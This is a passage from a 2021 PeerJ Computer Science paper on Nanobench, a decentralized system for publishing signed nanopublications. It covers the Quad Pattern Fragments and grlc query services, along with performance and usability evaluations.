how cryptographic hash values can be calculated on their content and included in their identifiers in the form of trusty URIs (Kuhn & Dumontier, 2015). Based on this, we established a decentralized and open server network, through which anybody can reliably publish and retrieve nanopublications (Kuhn et al., 2016), and we introduced index nanopublications, which allow for assigning nanopublications to versions of larger datasets (Kuhn et al., 2017). The work to be presented below is a continuation of this research line, adding query services and an intuitive publishing interface as components to this ecosystem. Our general approach is partly related to semantic wikis, for example, Ghidini et al. (2009), Baumeister, Reutelshoefer & Puppe (2011) and Kuhn (2008). They combine the ideas of the Semantic Web with the wiki concept, and therefore allow for quick and easy editing of semantic data. They focus on the collaborative process of consensus finding and its result in the form of a single coherent formal knowledge base, and as such, they focus less on individual contributions as the unit of reference. In terms of Linked Data APIs, SPARQL endpoints (Feigenbaum et al., 2013) are probably the most well-known example and they are often used for providing queryable access to RDF datasets. In practice, such endpoints often suffer from availability problems (Buil-Aranda et al., 2013), due to their public nature and the uncontrolled complexity of SPARQL queries. The Linked Data Fragments (LDF) framework (Verborgh et al., 2016) was initiated as an attempt to investigate alternative RDF query interfaces, where the total query effort can be distributed between server and client. Triple Pattern Fragments (TPF) (Verborgh et al., 2016), for example, heavily reduce the expressivity of queries that can be evaluated by a server, so clients that want answers to more complex SPARQL queries need to take up part of the execution load themselves. Through client-side query engines, such as Comunica (Taelman et al., 2018), complex SPARQL queries can be split into multiple triple pattern queries that can be executed separately by a TPF server and then joined to create the full result on the client-side. Another approach to address the problems of full SPARQL endpoints is grlc (Meroño-Peñuela & Hoekstra, 2016), a tool that automatically generates APIs from SPARQL templates. By providing a small number of possible API operations instead of SPARQL’s virtually unlimited query possibilities, grlc makes Linked Data access easier and better manageable on both, the client and server Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 3/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ side. A further noteworthy technology is the Linked Data Platform (LDP) (Speicher, Arwe & Malhotra, 2015) to manage and provide Linked Data. In order to establish connections between producers and consumers of Linked Data, subscription and notification protocols such as WebSub (https://www.w3.org/TR/websub/) and provenance pingbacks (https://www.w3.org/TR/prov-aq/#provenance-pingback) have been proposed. The approaches above mostly assume requests are targeted towards a central server. This centralization comes with the downsides that such a server forms a single point of failure, that we need to trust in the authority that runs it, and that it is difficult to scale. To address these problems, a number of more decentralized approaches have been proposed. LDF interfaces such as TPF, as introduced above, can in fact also be used in a more distributed fashion, as fragments can be published across different servers (Delva et al., 2019). Distributed approaches to semantically annotate web pages like https://schema.org/ (Guha, Brickley & Macbeth, 2016) have moreover shown strong adoption. Another example is Solid (Mansour et al., 2016), where users have their own personal Linked Data pod, in which they can store their own data and thereby are in full control of who can access it. Solid thereby targets personal and potentially confidential data, with a focus on access control and minimizing data duplication. The Solid ecosystem has been applied in a number of use cases, such as collaboration within decentralized construction projects (Werbrouck et al., 2020), and decentralization of citizen data within governments (Buyle et al., 2019). Such approaches where data is distributed but not replicated, however, often lead to major difficulties when queries need to be executed over such a federation of data sources (Taelman, Steyskal & Kirrane, 2020). This stands in contrast to decentralized approaches where data is not only distributed but also replicated, which typically target open and public data and have an emphasis on scalability and reliability. Blockchain-based solutions fall into the latter category, for which a whole range exists of possible approaches to integrate Linked Data (Third & Domingue, 2017). A core trade-off of all blockchain-based approaches is to either sacrifice some degree of decentralization with permissioned blockchains or to pay the price of the expensive mining process. For applications that do not crucially depend on a fixed and agreed-upon order of events, as cryptocurrencies do for their transaction ledger, the costs of Blockchain-based solutions in fact often do not seem to offset their benefits. Our approach to be presented below also falls into this second category of decentralization approaches with replicated data sources, but does not entail the costs of Blockchain-based approaches. APPROACH The approach to be presented here, as shown in Fig. 1, is based on our work on nanopublications and the ecosystem for publishing them, as introduced above. The core of this new approach is to allow end-users to directly publish Linked Data snippets in the form of nanopublications with our existing decentralized nanopublication publishing network through an interface powered by semantic templates, which are themselves published as nanopublications. Below we explain how users can establish their identity by announcing their public key, and how they can then sign, publish, and update their Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 4/23 https://www.w3.org/TR/websub/ https://www.w3.org/TR/prov-aq/#provenance-pingback https://schema.org/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ nanopublications. Then we describe our extension of Triple Pattern Fragments to support quads and thereby nanopublications. Next, we show how we defined two complementary sets of services on top of the existing nanopublication network to query and access the published data in a redundant and reliable way. Finally, we explain how these components together with semantic templates allowed us to build a flexible and intuitive end-user application called Nanobench. Identities and updates Nanopublications typically specify their creator in the publication info graph, but because anybody can publish anything they want through the existing open nanopublication network, there is no guarantee that this creator link is accurate. For that reason, we propose here a method to add a digital signature to the publication graph. With our approach, users have to first introduce their identifier and public key before they can publish their own nanopublications. This introduction is itself published as a signed nanopublication declaring the link between the personal identifier (such as an ORCID identifier) and the public key in its assertion graph, as shown by this example: sub:assertion { sub:keyDeclaration npx:declaredBy orcid:0000-0001-2345-6789 ; npx:hasAlgorithm "RSA"; npx:hasPublicKey "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQK…" . } Below, we will come back to the question of how we can ensure that this user is indeed in control of the stated ORCID identifier. Once an identity is established in this way, the respective user can publish nanopublications such as the one shown in Fig. 2, where the personal identifier and the public key are mentioned in the publication info graph (yellow) together with the digital signature that is calculated with the respective private key on the entire nanopublication, excluding only the npx:hasSignature triple and the hash code of the trusty URI. The trusty URI (here represented with the prefix this: ) is Figure 1 The architecture of our overall approach. Full-size DOI: 10.7717/peerj-cs.387/fig-1 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 5/23 http://dx.doi.org/10.7717/peerj-cs.387/fig-1 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ calculated as a last step, which therefore also covers the signature. This makes the nanopublication including its signature verifiable and immutable. Immutability is a desirable property to ensure stable and reliable linking, but for practical purposes it has to come with a mechanism to declare updates and mark obsolete entries. With our approach, new versions of a nanopublication can be declared with the npx:supersedes property in the publication info graph of the nanopublication containing the update, for example: sub:pubinfo { this: npx:supersedes . … } In order to declare a nanopublication obsolete without an update, the npx:retracts property can be used in the assertion graph of a separate retraction nanopublication, for example: sub:assertion { orcid:0000-0001-2345-6789 npx:retracts . } Figure 2 Example nanopublication in TriG notation that was published with Nanobench. Full-size DOI: 10.7717/peerj-cs.387/fig-2 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 6/23 http://dx.doi.org/10.7717/peerj-cs.387/fig-2 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Of course, updated versions and retractions should only be considered valid if authorized by the author of the original nanopublication. For the scope of this work, we only consider them valid if the retraction or update is signed with the same key pair, but more flexible solutions are possible in the future. The elements introduced so far allow us to cryptographically verify that given nanopublications were published by the same user who introduced herself in her introduction nanopublication, but they still allow anybody to claim any ORCID identifier (or other kind of identifier). To add this missing link, users can add the link of their introduction nanopublication to their ORCID profile under “Websites & Social Links”, which proves that they have control of that account. This link is represented with foaf:page when the user identifier is resolved with a HTTP GET request asking for an RDF representation via content negotiation. This is thereby a general method that can work on any URL scheme and identification mechanism providing dereferenceable user identifiers, but for simplicity we will restrict our discussion here to ORCID identifiers. Quad pattern fragments Nanopublications, as can be seen in Fig. 2, are represented as four named RDF graphs. Triple Pattern Fragments, however, as their names indicates, only support triples and not quads (which include the graph information), and TPF is therefore insufficient for querying nanopublications. For this reason, we introduce an extension of TPF to support quads, called Quad Pattern Fragments (QPF) (https://linkeddatafragments.org/ specification/quad-pattern-fragments/). In order to allow querying over QPF, its HTTP responses include metadata that declaratively describe the controls via which querying is possible. These controls are defined in a similar way as for TPF using the Hydra Core vocabulary (Lanthaler & Gütl, 2013), and allows intelligent query engines to detect and use them. Below, an example of these controls is shown: @prefix rdf: . @prefix hydra: . @prefix void: . @prefix sd: . a void:Dataset, hydra:Collection; void:subset ; sd:defaultGraph ; hydra:search _:pattern. _:pattern hydra:template "https://example.org/{?s,p,o,g}"; hydra:variableRepresentation hydra:ExplicitRepresentation; hydra:mapping _:subject, _:predicate, _:object, _:graph. _:subject hydra:variable "s"; hydra:property rdf:subject. _:predicate hydra:variable "p"; hydra:property rdf:predicate. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 7/23 https://linkeddatafragments.org/specification/quad-pattern-fragments/ https://linkeddatafragments.org/specification/quad-pattern-fragments/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ _:object hydra:variable "o"; hydra:property rdf:object. _:graph hydra:variable "g"; hydra:property sd:graph. The control above indicates that the QPF API accepts four URL parameters, corresponding to the four elements of a quad. For example, a query to this API for the pattern ?s npx:retracts ?o sub:assertion would result in an HTTP request for the URL https://example.org/?p=npx:retracts&g=sub:assertion1. Just like with TPF, intelligent clients can be built that can handle more complex queries (such as SPARQL queries) over QPF APIs. This requires these clients to split up a SPARQL query into multiple quad patterns, which can be resolved by the API, after which they can be joined by the client to form a complete query result. QPF has been designed to be backwards-compatible with TPF. This means that clients that implement support for TPF APIs, but do not understand the notion of QPF, will be able to recognize the API as TPF, and execute triple pattern queries against it. Due to the declaratively described QPF and TPF controls, clients such as the Comunica engine can recognize and make use of both variants next to each other. A live version of a QPF API can be found at https://ldf.nanopubs.knows.idlab.ugent.be/np, which is one of six instances of this service in our network2. Nanopublication services Nanopublications can be reliably and redundantly published by uploading them to the existing nanopublication server network (Kuhn et al., 2016), which at the time of writing consists of eleven severs in five countries and storing more than 10 million nanopublications (http://purl.org/nanopub/monitor). This network implements a basic publishing layer where nanopublications can be looked up by their trusty URI, but no querying features are provided. In order to allow for querying of the nanopublications’ content, we present here our implementation of a new service layer built on top of the existing publication layer. While we are using a triple store with SPARQL under the hood, we do not provide a full-blown SPARQL endpoint to users in order to address the above-mentioned problems of availability and scalability. For our nanopublication service layer, we employ a mix of two kinds of services that are more restricted than SPARQL but also more scalable. The first kind of service is based on LDF via our QPF API, as introduced above, and allows only for simple queries at the level of individual RDF statements but does not impose further restrictions. The second one is based on the grlc API generator (Meroño-Peñuela & Hoekstra, 2016), which optionally comes with the Tapas HTML interface (Lisena et al., 2019) and which can be used to execute complex queries but is restricted to a small number of predefined patterns. The LDF-based services reduce the complexity and load on the server by only allowing for very simple queries to be asked to the server, and delegate the responsibility of orchestrating them to answer more complex questions to the client. The grlc-based 1 For simplicity, URLs for p and g are prefixed, whereas they will be expanded in practise. 2 A live example of a QPF client that can query over this API can be found at http://query.linkeddatafragments.org/ #datasources=https%3A%2F%2Fldf. nanopubs.knows.idlab.ugent.be%2Fnp. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 8/23 https://example.org/?p=npx:retracts&g=sub:assertion https://ldf.nanopubs.knows.idlab.ugent.be/np http://purl.org/nanopub/monitor http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ services reduce the complexity and load by allowing only for queries that are based on a small number of SPARQL templates that are hand-crafted for optimized performance. These two kinds of services are thereby designed to be complementary, with grlc being restricted but faster and LDF being more powerful but slower. The grlc-based services provide general API operations that are based on 14 SPARQL templates: � find_nanopubs returns all nanopublication identifiers in undefined order (paginated in groups of 1,000) possibly restricted by the year, month, or day of creation; � find_nanopubs_with_pattern additionally allows for specifying the subject, predicate, and/or object of a triple in the nanopublication as a filter, and to restrict the occurrence of that triple to the assertion, provenance, or publication info graph; � find_nanopubs_with_uri similarly allows for filtering by a URI irrespective of its triple position; � find_nanopubs_with_text supports full-text search on the literals in the nanopublication (using non-standard SPARQL features available in Virtuoso and GraphDB); � for each of the four find_nanopubs_* templates mentioned above, there is also a find_signed_nanopubs_* version that only returns nanopublications that have a valid signature and that allows for filtering by public key; � get_all_indexes returns all nanopublication indexes (i.e., sets of nanopublications); � get_all_users returns all users who announced a public key via an introduction nanopublication; � get_backlinks returns all identifiers of nanopublications that directly point to a given nanopublication; � get_deep_backlinks does the same thing but includes deep links through chains of nanopublications linking to the given one; � get_latest_version returns the latest version of a given nanopublication signed by the same public key by following npx:supersedes backlinks; � get_nanopub_count returns the number of nanopublications, possibly restricted by year, month, or day of creation. The full SPARQL templates can be found in the Supplemental Material (see below). These API calls provide a general set of queries based on which applications with more complex behavior can be built. We will introduce Nanobench as an example of such an application below. In order to answer some of the above queries, auxiliary data structures have to be created while loading new nanopublications. Most importantly, digital signatures cannot be checked in SPARQL directly, as this involves translating the triples of a nanopublication into a normalized serialization and then calculating a cryptographic hash function on it, which goes beyond SPARQL’s capabilities. Other aspects like deep backlinks are complicated because it is not sufficient to check whether a link is present, but we also need Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 9/23 http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ to check that the respective triple is located in the linking nanopublication (as a triple linking two nanopublications could itself be located in a third nanopublication). In order to solve these problems, additional triples in two administrative graphs are generated when new nanopublications are loaded. Concretely, the following triples are added for each nanopublication (placeholders in capitals): npa:graph { npa:hasHeadGraph ; dct:created "DATETIME"^^xsd:dateTime ; npa:creationDay ; npa:creationMonth ; npa:creationYear ; npa:hasValidSignatureForPublicKey "PUBLICKEY" . } npa:networkGraph {

REFERENCED-NPURIS… . npa:refersToNanopub REFERENCED-NPURIS… . } The first triple of the npa:graph links the nanopublication identifier to its head graph, where the links to its assertion, provenance, and publication info graphs can be found. The second one contains the creation date in a normalized form. Number three to five allow for efficient filtering by day, month, and year, respectively (we use URIs instead of literals because this happens to be much faster for filtering under Virtuoso). The final triple in the npa:graph links the nanopublication to its public key if the signature was found to be valid. In the npa:networkGraph, all instances of linking to another nanopublication with the linking nanopublication URI in subject position are added (e.g., with npx: supersedes). In the cases where another nanopublication is linked but not with the pattern of the linking nanopublication in subject position (e.g., as with npx:retracts), npa:refersToNanopub is used as predicate to link the two nanopublications. We set up a network of six servers in five different countries each providing both of the introduced services (LDF-based and grlc-based). They are notified about new nanopublications by the servers of the existing publishing network, which are otherwise running independently. The services connect to a local instance of a Virtuoso triple store (https://virtuoso.openlinksw.com/), into which all nanopublications are loaded via a connector module. This connector module also creates the additional triples in the administrative graphs as explained above. While the restriction to predefined templates with grlc significantly improves the scalability of the system as compared to unrestricted SPARQL, further measures will be needed in the future if the number of nanopublications keeps growing to new orders of magnitude. The services presented here are designed in such a way that such measures are possible with minimal changes to the API. The 14 query templates of the grlc services can be distributed to different servers, for example, such that a single server would only be Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 10/23 https://virtuoso.openlinksw.com/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ responsible for one of the 14 kinds of queries. This server could then use an optimized data structure for exactly that kind of query and would only need to hold a fraction of the data. The find_ queries could moreover be further compartmentalized based on publication date, for example each server instance just covering a single year. The LDF-based services could be distributed in a similar fashion, for example based on the predicate namespace. Nanobench client and templates To demonstrate and evaluate our approach, we next implemented a client application that runs on the user’s local computer, can be accessed through their web browser, and connects to the above decentralized network of services. The code can be found online (https://github.com/peta-pico/nanobench) and Fig. 3 shows a screenshot. In the “search” part of the interface, users are provided with a simple search interface that connects to the grlc API operations find_nanopubs_with_uri (if a URI is entered in the search field) or find_nanopubs_with_text (otherwise). In the “others” part, other users’ latest nanopublications can be seen in a feed-like manner, similar to Twitter feeds. In order for users to publish their own nanopublications and thereby create their own feed, they have to first set up their profile. Nanobench provides close guidance through this process, which involves the declaration of the user’s ORCID identifier, the creation of an RSA key pair, and the publication of an introduction nanopublication that links the public key to the ORCID identifier. The last step of linking the new introduction nanopublication from the user’s ORCID profile is not strictly necessary for the user to start publishing nanopublications and is therefore marked as optional. Once the user profile is completed, a list of templates is shown in the “publish” part of the interface. Templates are published as nanopublications as well, and so this list can be populated via a call to the find_signed_nanopubs_with_pattern operation of the grlc-based services. Currently, the list includes templates for free-text commenting on a URL, expressing a foaf:knows relation to another person, declaring that the user has read a given paper, expressing a gene–disease association, retracting a nanopublication, describing a datasets with a SPARQL endpoint, and publishing an arbitrary RDF triple. Figure 3 A screenshot of the Nanobench application with a publication form. Full-size DOI: 10.7717/peerj-cs.387/fig-3 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 11/23 https://github.com/peta-pico/nanobench http://dx.doi.org/10.7717/peerj-cs.387/fig-3 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ After selecting a template, a form is automatically generated that allows the user to fill in information according to that template, as shown in Fig. 3. Templates describe the kind of statements users can publish and also provide additional information on how the input form should be presented to the user. This is an example of a template (the same one that is shown in Fig. 3), defined in the assertion graph of a nanopublication: sub:assertion { sub:assertion a nt:AssertionTemplate ; rdfs:label "Expressing that you know somebody" ; nt:hasStatement sub:st1 . sub:st1 a rdf:Statement ; rdf:subject nt:CREATOR ; rdf:predicate foaf:knows ; rdf:object sub:person . foaf:knows rdfs:label "know" . sub:person a nt:UriPlaceholder ; rdfs:label "ORCID identifier of the person you know" ; nt:hasPrefix "https://orcid.org/" ; nt:hasRegex "[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{3}[0-9X]" . } In a template nanopublication, the assertion graph is classified as an AssertionTemplate (in the namespace https://w3id.org/np/o/ntemplate/) and given a human readable label with rdfs:label. Moreover, it is linked to the statement templates (i.e., triples in the nanopublications to be published) via hasStatement. The above example has just one such statement template, but more complex templates involve several of them. These templates then use regular RDF reification to point to their subjects, predicates, and objects. In the case of multiple statements, their order in the form can be defined with statementOrder and some of them can be marked as optional by classifying them as OptionalStatement. rdfs:label can be used on all the elements to define how they should be labeled in the form interface, and the special URI CREATOR is mapped to the identifier of the user applying the template. Importantly, the URIs in subject, predicate, or object position of the template statements can be declared placeholders with the class UriPlaceholder, and similarly for literals with LiteralPlaceholder. Such placeholders are represented as input elements, such as text fields or drop-down menus, in the form that is generated from the template. Currently supported more specific placeholder types include TrustyUriPlaceholder, which requires a trusty URI (such as a nanopublication URI), and RestrictedChoicePlaceholder, which leads to a drop-down menu with the possible options defined by the property possibleValue. For URI placeholders, prefixes can be defined with hasPrefix and regex restrictions with hasRegex, as can be seen in the example above. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 12/23 https://w3id.org/np/o/ntemplate/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Once the user filled in a form that was generated from a template and clicks on “Publish”, Nanobench creates the assertion graph of a new nanopublication by following the template and replacing all the placeholders with the user’s input. For the provenance graph, only a simple prov:wasAttributedTo link to the user’s identifier is currently added (we are working on extending the coverage of templates to the provenance and publication info graphs). In the publication info graph, Nanobench adds a timestamp, specifies the user as the creator of the nanopublication, and adds a wasCreatedFromTemplate link that points to the underlying template nanopublication. Then, Nanobench adds a digital signature element to the publication info graph with a signature made from the user’s local private key, transforms the whole nanopublication into its final state with a trusty URI, and finally publishes it to the server network with a simple HTTP POST request. Within a few minutes or less, it then appears in the user’s feed. Nanobench currently makes use of the redundancy of the nanopublication services in a very simple way: For each query, it randomly selects two grlc service instances and sends the same query to both. It then processes the result as soon as it gets the first answer and discards the second, thereby increasing the chance of success and lowering the average waiting time. More sophisticated versions of this protocol are of course easily imaginable and will be investigated in future work. PERFORMANCE EVALUATION In order to evaluate our approach, we introduce here a performance evaluation that we ran on the network of nanopublication services. In the next section we will then look into whether these services are useful to potential end users with a usability evaluation on Nanobench. Performance evaluation design For this performance evaluation we wanted to find out how well the two types of services— LDF-based and grlc-based—perform in our network of services, how they compare, and to what extent they are really complementary. For this purpose, we defined a set of concrete queries that we can then submit to both services. We started with the 14 query templates of the grlc-based service, and instantiated each of them with a simple set of parameters to make 14 concrete executable queries. As parameter values, we chose generic yet realistically useful examples that return non-trivial answer sets for the kind of nanopublications that the current templates describe: (1) find_nanopubs restricted to the month 2020-02; (2) find_nanopubs_with_pattern with the predicate value set to foaf:knows; (3) find_nanopubs_with_text on the free-text keyword “john”; (4) find_nanopubs_with_uri to search for nanopublications mentioning a given ORCID identifier; (5–8) of the form find_signed_nanopubs_* are given the same parameters as (1–4); (9) get_all_indexes and (10) get_all_users do not need parameters; (11) get_backlinks and (12) get_deep_backlinks are given the URI of a specific nanopublication, which has a substantial number of backlinks; (13) get_latest_version is given the URI of the first version of a template Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 13/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ nanopublication that has afterwards been updated four times; and (14) get_nanopub_count is, like (1), restricted to the month 2020-02. We can run these queries via the grlc-powered API but we can also use an LDF engine like Comunica to run them against our LDF-based services. The latter comes with some caveats, as the free text queries of find_nanopubs_with_text and find_signed_nanopubs_with_text depend on implementation-dependent non-standard extensions of SPARQL that do not work with LDF-style query execution. Moreover, Comunica currently lacks support for complex property paths, which are needed for get_deep_backlinks and get_latest_version. Queries (3), (7), (12), and (13) can therefore only be run on the grlc-based services but not on the LDF-based ones. However, the power of the LDF-based services is of course that they can (potentially) run arbitrary SPARQL queries (with some restrictions, as mentioned above). To demonstrate and test this ability, we created another query (15) that in a simple way combines the outputs of two of the currently available templates. Specifically, it checks for a given user (below abbreviated as me:) who he has declared to know via the foaf:knows template, and then searches for papers these people declared to have read via a different template. Thereby, query (15) returns a list of all papers that friends of the user me: have read: select ?person ?paper where { me: foaf:knows ?person . ?person pc:hasRead ?paper . } This query can be considered a quick-and-dirty solution for exploration purposes, as it misses a number of checks. It does not check that both triples are in the assertion graphs of signed nanopublications, that the first is signed with the public key corresponding to the user in subject position, and that neither of the nanopublications is superseded or retracted. We therefore define query (16) that includes all these checks. This query is more complicated, and we show here for illustration just the SPARQL fragment of the part necessary to check that the second nanopublication ?np2 with public key ?pubkey2 was not retracted: filter not exists { graph npa:graph { ?retraction npa:hasHeadGraph ?rh . ?retraction npa:hasValidSignatureForPublicKey ?pubkey2 . } graph ?rh { ?retraction np:hasAssertion ?ra . } graph ?ra { ?somebody npx:retracts ?np2 . } } The inconvenience of writing such rather complicated queries can be addressed by future versions of the services, which could include predefined options to restrict the query to the assertion graphs and to up-to-date content. The full set of used Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 14/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ queries and further details can be found in the Supplemental Material online (DOI 10.5281/zenodo.3994068). To evaluate the performance of the nanopublication services, we accessed them in a clearly defined setting from a number of different locations from personal computers via home networks, by running the 16 queries specified above on all service instances of both kinds. For that, we created a Docker image that accesses the grlc-based services with simple HTTP requests via curl and the LDF-based ones with the Comunica (https://github.com/comunica/comunica) engine 1.12.1. The results as well as the execution time of all the calls are recorded, which is then used to evaluate the performance. For both kinds of services, the timeout is set to 60 s. Performance evaluation results We ran the Dockerized evaluation process described above at five places in four different countries. Each of them ran all of the compatible queries on each of the six existing service instance for both of the two kinds. For each query we therefore have 30 outcomes for grlc and another 30 outcomes for LDF. These outcomes fall into the general categories of timeout, error, and full result. In the case of the LDF-based services, timeout and error outcomes can come with partial results. Figure 4 shows a summary of these overall outcomes. With grlc, 96% of the calls succeeded and only 4% resulted in an error (mostly due to downtime of one particular service). With LDF, 73% fully succeeded, 21% reached the timeout, and 6% gave an error. The latter two sometimes gave partial results: overall 6% reached a timeout while still giving partial results, and overall 3% gave an error with a partial result. For LDF, these types of outcomes are not evenly distributed. Two queries— find_nanopubs_with_uri (4) and get_all_indexes (9)—never fully succeeded, but the former sometimes gave partial results. For the remaining queries, however, these LDF calls returned at least a partial result in 97% of the cases. Except for query (1) in addition to the above mentioned (4) and (9), the full result was always received from at least one of the servers in LDF mode. For grlc, this was the case for all queries. 0 0.2 0.4 0.6 0.8 1 grlc timeout without result timeout with partial result error without result error with partial result full result 16_papers_x 15_papers 14_get_nanopub_count 13_get_latest_version 12_get_deep_backlinks 11_get_backlinks 10_get_all_users 09_get_all_indexes 08_find_signed_nanopubs_with_uri 07_find_signed_nanopubs_with_text 06_find_signed_nanopubs_with_pattern 05_find_signed_nanopubs 04_find_nanopubs_with_uri 03_find_nanopubs_with_text 02_find_nanopubs_with_pattern 01_find_nanopubs 0 0.2 0.4 0.6 0.8 1 LDF ratio of query executions Figure 4 Overall outcomes per query and kind of service, executed from five locations. Full-size DOI: 10.7717/peerj-cs.387/fig-4 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 15/23 http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information https://doi.org/10.5281/zenodo.3994068 https://github.com/comunica/comunica http://dx.doi.org/10.7717/peerj-cs.387/fig-4 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ A client checking multiple servers would therefore have eventually received the full result. For query (1) in LDF mode, this was true for 4 cases out of 5. Next, we can look at the time performance. Table 1 shows the average execution times per query and service type, including only the calls that returned a full result. The successful queries to the grlc services took on average from 0.21 to 6.46 s. For the LDF services, these numbers range from 1.53 to 35.26 s (but they can be a bit misleading as they ignore the fact that the LDF services repeatedly hit the time limit of 60 s). For the queries that could successfully be run on both kinds of services, LDF is on average 7.18 to 86.50 times slower than grlc. Importantly, the queries that do not follow a predefined pattern (15) and (16) gave the full result with LDF in 97% of the cases and ran reasonably fast. The quick-and-dirty version (15) required on average 2.30 s, whereas the thorough one (16) completed on average after 10.07 s. USABILITY EVALUATION Now that we know that the services perform reasonably well, we wanted to find out whether this general approach and our specific Nanobench tool indeed makes it easy for users who might not be experts in Linked Data to publish their own small data entries. Usability evaluation design We wanted to test the usability of Nanobench in a real setting, where users actually publish nanopublications. For that we wrote detailed instructions on how to install and use Nanobench and its publication feature, which includes downloading the latest Nanobench release, running it locally, accessing Nanobench through their web browser, completing the Nanobench profile, accessing the list of templates, and finally filling in and submitting Table 1 Average execution times of the successful query executions in seconds. Query grlc LDF L/g 1 find_nanopubs 1.02 35.26 34.48 2 find_nanopubs_with_pattern 0.55 6.69 12.20 3 find_nanopubs_with_text 6.46 4 find_nanopubs_with_uri 0.78 5 find_signed_nanopubs 0.49 20.77 42.05 6 find_signed_nanopubs_with_pattern 0.73 9.57 13.04 7 find_signed_nanopubs_with_text 1.54 8 find_signed_nanopubs_with_uri 0.34 29.53 86.50 9 get_all_indexes 3.52 10 get_all_users 0.65 31.09 47.71 11 get_backlinks 0.21 1.53 7.18 12 get_deep_backlinks 0.68 13 get_latest_version 0.71 14 get_nanopub_count 0.23 6.54 28.29 15 papers 2.30 16 papers_x 10.07 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 16/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ the publication form generated from a chosen template. Through mailing lists, social media, and personal contacts, we tried to convince as many people as possible to try out Nanobench and to publish some nanopublications on their own. Next, we created an anonymous usability questionnaire, consisting of the ten standard questions of the widely used System Usability Scale (SUS) (Brooke, 1996). We added to that the questions “Have you published RDF/Linked Data before?” and “Have you digitally signed RDF/Linked Data before?”, and as a follow up to each of them—if the answer was “yes”—whether Nanobench was harder or easier to use for publishing and signing Linked Data, respectively, compared to how they previously did it. The responses were on a 5-point Likert scale from 1 (Nanobench was harder) to 5 (Nanobench was easier). We sent this questionnaire to all the Nanobench users who published at least one nanopublication (not counting their introduction nanopublication), excluding the co-authors of this paper and their close relatives. Further details, including instructions and questionnaire, can be found in the supplemental material online (DOI 10.5281/zenodo.3994066). Usability evaluation results Overall, 42 users registered in the decentralized system by publishing an introduction nanopublication. A total of 29 of them (69%) also linked this introduction nanopublication from their ORCID accounts, which was a step that was marked as optional. Collectively, they published 81 nanopublications, not counting their introduction nanopublications, via the use of seven distinct templates. After applying the exclusion criteria defined above, we arrived at a set of 29 users to whom we sent the anonymous usability questionnaire (this set of users is overlapping but different from the set of 29 users mentioned just above). After sending up to two reminders, we received responses from all of them. On the question of whether they had published Linked Data before, 21 respondents (72%) said they did. 20 of them (95%) reported that Nanobench was easier to use compared to how they previously published Linked Data, with the remaining one being indifferent (score of 3). The average was 4.5 on the 5-point Likert scale. Of the 21 respondents, only three (14%) stated that they had previously digitally signed Linked Data. All three of them found Nanobench easier, giving two times a 5 and once a 4 as responses (average 4.7). Table 2 shows the results of the SUS questions. Overall, our system achieved a SUS score of 77.76, which is clearly above the average score reported in the literature (70.14) and is roughly in the middle between “good” and “excellent” on an adjective scale (Bangor, Kortum & Miller, 2008). Interestingly, if we only consider the eight respondents who stated they had never published Linked Data before, this value is even better at 85.94, clearly in the “excellent” range. The participants were moreover given the possibility to provide further feedback in a free-text field. We received a variety of comments for further improvement, but except for the point that the required local installation was somewhat inconvenient, no point was mentioned more than once. The other comments concerned the search page being confusing (this part of the interface was indeed not the focus of the study), the lack of Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 17/23 http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information https://doi.org/10.5281/zenodo.3994066 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ support for batch publishing of multiple similar nanopublications, the lack of integrated ORCID lookup, the relatively small number of general-purpose templates, the lack of RDF prefix recognition, the fact that not all lengthy URIs are masked with readable labels in the user interface, and the fact that the confirmation checkbox did not mention the possibility of retraction. A further comment was that a command-line interface would have been preferred in the particular context of the given participant. Such a command-line interface actually exists (as part of the nanopub-java library; Kuhn, 2016) but was not the focus of this study. DISCUSSION AND CONCLUSION The results of the performance study described above confirm that the tested kinds 